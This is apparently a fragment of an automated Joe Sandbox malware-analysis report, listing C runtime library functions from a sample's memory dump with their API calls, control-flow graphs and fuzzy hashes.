                                                • Associated: 0000002A.00000002.3484346566.00000000001F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                • Associated: 0000002A.00000002.3484363295.00000000001FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                • Associated: 0000002A.00000002.3484383020.00000000001FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_42_2_1f0000_Cy9OUo.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                • API String ID: 1028249917-2843748187
                                                • Opcode ID: 7459b5717b75cb09ddad57e0346609035099fd3a1414fb819e4a22b38f6e6fd3
                                                • Instruction ID: 0a26ca4c3d3beae49a1f465f3f8c9baef9f39aafcc768562282c1e51edc9d44a
                                                • Opcode Fuzzy Hash: 7459b5717b75cb09ddad57e0346609035099fd3a1414fb819e4a22b38f6e6fd3
                                                • Instruction Fuzzy Hash: CB11E471940B09DFD720EF75D845B7ABBE0AF20320F10451AE69AA37A0CF74A941CF20
                                                Function 001F40A0 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 170 1f40a0-1f40bb call 1f264c call 1f2345 175 1f40bd-1f40c1 170->175 176 1f40da-1f40f2 call 1f2aa0 170->176 175->176 178 1f40c3 175->178 183 1f412a-1f4136 call 1f413b 176->183 184 1f40f4-1f40f6 176->184 179 1f40c6-1f40c8 178->179 181 1f40ca-1f40d1 call 1f1411 179->181 182 1f40d2-1f40d9 call 1f2691 179->182 181->182 183->179 188 1f40f8-1f4101 InterlockedDecrement 184->188 189 1f4112-1f4124 InterlockedIncrement 184->189 188->189 193 1f4103-1f4109 188->193 189->183 193->189 194 1f410b-1f4111 call 1f35ee 193->194 194->189
                                                APIs
                                                • __getptd.LIBCMT ref: 001F40AC
                                                  • Part of subcall function 001F2345: __getptd_noexit.LIBCMT ref: 001F2348
                                                  • Part of subcall function 001F2345: __amsg_exit.LIBCMT ref: 001F2355
                                                • __amsg_exit.LIBCMT ref: 001F40CC
                                                • __lock.LIBCMT ref: 001F40DC
                                                • InterlockedDecrement.KERNEL32(?), ref: 001F40F9
                                                • InterlockedIncrement.KERNEL32(028C2B98), ref: 001F4124
                                                Memory Dump Source
                                                • Source File: 0000002A.00000002.3484326502.00000000001F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001F0000, based on PE: true
                                                • Associated: 0000002A.00000002.3484305410.00000000001F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                • Associated: 0000002A.00000002.3484346566.00000000001F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                • Associated: 0000002A.00000002.3484363295.00000000001FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                • Associated: 0000002A.00000002.3484383020.00000000001FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_42_2_1f0000_Cy9OUo.jbxd
                                                Similarity
                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                • String ID:
                                                • API String ID: 4271482742-0
                                                • Opcode ID: 34fc972bcd1ceef56bf00eaef4edd4943fca4f0e73acee6443ef6ab3cd680b61
                                                • Instruction ID: 066c7caa931eb47e3e594b8c6537c13e4da7c08008be23978e885381adc9dd1d
                                                • Opcode Fuzzy Hash: 34fc972bcd1ceef56bf00eaef4edd4943fca4f0e73acee6443ef6ab3cd680b61
                                                • Instruction Fuzzy Hash: 6801AD71901629ABCB21AF2498063BE7360BF20710F458015FB04A7A91CF787991CBD6
                                                Function 001F35EE Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 197 1f35ee-1f35ff call 1f264c 200 1f3676-1f367b call 1f2691 197->200 201 1f3601-1f3608 197->201 203 1f364d 201->203 204 1f360a-1f3622 call 1f2aa0 call 1f45e4 201->204 206 1f364e-1f365e HeapFree 203->206 214 1f362d-1f363d call 1f3644 204->214 215 1f3624-1f362c call 1f4614 204->215 206->200 208 1f3660-1f3675 call 1f2c72 GetLastError call 1f2c30 206->208 208->200 214->200 222 1f363f-1f3642 214->222 215->214 222->206
                                                APIs
                                                • __lock.LIBCMT ref: 001F360C
                                                  • Part of subcall function 001F2AA0: __mtinitlocknum.LIBCMT ref: 001F2AB6
                                                  • Part of subcall function 001F2AA0: __amsg_exit.LIBCMT ref: 001F2AC2
                                                  • Part of subcall function 001F2AA0: EnterCriticalSection.KERNEL32(?,?,?,001F5600,00000004,001F9628,0000000C,001F3746,?,?,00000000,00000000,00000000,?,001F22F7,00000001), ref: 001F2ACA
                                                • ___sbh_find_block.LIBCMT ref: 001F3617
                                                • ___sbh_free_block.LIBCMT ref: 001F3626
                                                • HeapFree.KERNEL32(00000000,?,001F9568,0000000C,001F2A81,00000000,001F94C8,0000000C,001F2ABB,?,?,?,001F5600,00000004,001F9628,0000000C), ref: 001F3656
                                                • GetLastError.KERNEL32(?,001F5600,00000004,001F9628,0000000C,001F3746,?,?,00000000,00000000,00000000,?,001F22F7,00000001,00000214), ref: 001F3667
                                                Memory Dump Source
                                                • Source File: 0000002A.00000002.3484326502.00000000001F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001F0000, based on PE: true
                                                • Associated: 0000002A.00000002.3484305410.00000000001F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                • Associated: 0000002A.00000002.3484346566.00000000001F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                • Associated: 0000002A.00000002.3484363295.00000000001FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                • Associated: 0000002A.00000002.3484383020.00000000001FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_42_2_1f0000_Cy9OUo.jbxd
                                                Similarity
                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                • String ID:
                                                • API String ID: 2714421763-0
                                                • Opcode ID: 06edcfc4ea599f1d6425614332219627d4eb101dc1f3ad10e543a2bf402f3c3c
                                                • Instruction ID: 317f1ddeeee826fe2e10fbda9843d3fc520ef37444e0ee33f411b8a3c52ff6c9
                                                • Opcode Fuzzy Hash: 06edcfc4ea599f1d6425614332219627d4eb101dc1f3ad10e543a2bf402f3c3c
                                                • Instruction Fuzzy Hash: BC014B7190530DAADF216B719C06B7E7A64AF21770F604109F714E6291DF348B80CAA9
                                                Function 001F3E04 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 223 1f3e04-1f3e1f call 1f264c call 1f2345 228 1f3e43-1f3e6c call 1f2aa0 call 1f3dc6 call 1f3e6e 223->228 229 1f3e21-1f3e25 223->229 236 1f3e2f-1f3e31 228->236 229->228 230 1f3e27-1f3e2c call 1f2345 229->230 230->236 238 1f3e3b-1f3e42 call 1f2691 236->238 239 1f3e33-1f3e3a call 1f1411 236->239 239->238
                                                APIs
                                                • __getptd.LIBCMT ref: 001F3E10
                                                  • Part of subcall function 001F2345: __getptd_noexit.LIBCMT ref: 001F2348
                                                  • Part of subcall function 001F2345: __amsg_exit.LIBCMT ref: 001F2355
                                                • __getptd.LIBCMT ref: 001F3E27
                                                • __amsg_exit.LIBCMT ref: 001F3E35
                                                • __lock.LIBCMT ref: 001F3E45
                                                Memory Dump Source
                                                • Source File: 0000002A.00000002.3484326502.00000000001F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001F0000, based on PE: true
                                                • Associated: 0000002A.00000002.3484305410.00000000001F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                • Associated: 0000002A.00000002.3484346566.00000000001F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                • Associated: 0000002A.00000002.3484363295.00000000001FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                • Associated: 0000002A.00000002.3484383020.00000000001FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_42_2_1f0000_Cy9OUo.jbxd
                                                Similarity
                                                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                • String ID:
                                                • API String ID: 3521780317-0
                                                • Opcode ID: 3ea3ffd3cbe7d8c864ee36f96045c619598109bb0a87f8badfbeb41a4e2d9d8a
                                                • Instruction ID: a846ba387971aeaf1b04c6522a7be2438b333fa9424391eaf4e92d1e2f010314
                                                • Opcode Fuzzy Hash: 3ea3ffd3cbe7d8c864ee36f96045c619598109bb0a87f8badfbeb41a4e2d9d8a
                                                • Instruction Fuzzy Hash: 24F09072A0070D8BD721FB74840677D72A0AF68720F504149E7659B6D2CB749A41CB52